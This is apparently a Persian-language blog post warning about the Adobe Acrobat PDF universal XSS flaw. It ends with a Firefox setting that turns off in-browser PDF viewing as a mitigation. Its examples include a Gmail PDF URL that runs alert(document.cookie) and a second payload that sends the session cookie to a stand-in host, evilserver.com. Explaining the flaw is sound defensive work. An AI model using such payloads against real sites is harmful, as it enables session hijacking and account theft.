http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
برای یک مثال واقعی، می توانید پس از وارد شدن به حساب Google/Gmail خود از آدرس زیر بازدید کنید:
http://mail.google.com/mail/help/docs/
Gmail_shortcuts.pdf#blah=javascript:alert(document.cookie);
آنچه خروجی این آدرس خواهد بود، برابر document.cookie حساب Gmail شما است، که برابر با session جاری شما خواهد بود. این session را می توان با هدایت به یک اسکریپت دزدید و در این صورت حساب شما مورد تهدید قرار خواهد گرفت. نمونه خطرناکتر آدرس بالا را می توان این گونه بیان کرد:
http://mail.google.com/mail/help/docs/Gmail_shortcuts.pdf#blah=javascript:
document.location=’http://evilserver.com/capturecookie.cgi?cookie=’+
document.cookie;
این سناریو، تنها نمونه ای است، که آسیب پذیری جدید نمایش فایل های PDF می تواند برای شما ایجاد کند. این نقص، به این صورت عمل می کند که فایل های PDF بدون هیچ دلیلی توانایی اجرای کدهای جاوا اسکریپت را دارا هستند. نکته قابل تامل در این نقص، این است که هیچ نیازی به وجود دسرسی ویژه ای برای آن فایل وجود ندارد و ابزار لازم برای شروع یک حمله، تنها وجود یک فایل PDF بر روی یک وب سرور است. با توجه به نوع این نقص امکان فیلتر کردن آن بر روی برنامه های وب سرور تقریبا وجود ندارد. اگر از مرورگر فایرفاکس استفاده می کنید، در حال حاضر سریعترین روش برای جلوگیری از بروز تهدید، غیرفعال کردن نمایش فایل های PDF در مرورگر است. به این روش این کار را می توانید انجام دهید :
Firefox->Tools->Options->Content->Manage->change PDF action to “Save todisk”.
برای اطلاعات بیشتر در این مورد می توانید به نوشته Adobe Acrobat JavaScript Execution Bug is a Huge Security Issue مراجعه کنید. شروع اصلی بحث در لیست webappsec همچنان در حال ادامه است. مراجعه کنید به Universal XSS with PDF files: highly dangerous برای دیدن نظرات مختلف در این مورد. نوشته GNUCITIZEN در این مورد | نوشته ha.ckers در مورد PDF XSS
دیدگاهتان را بنویسید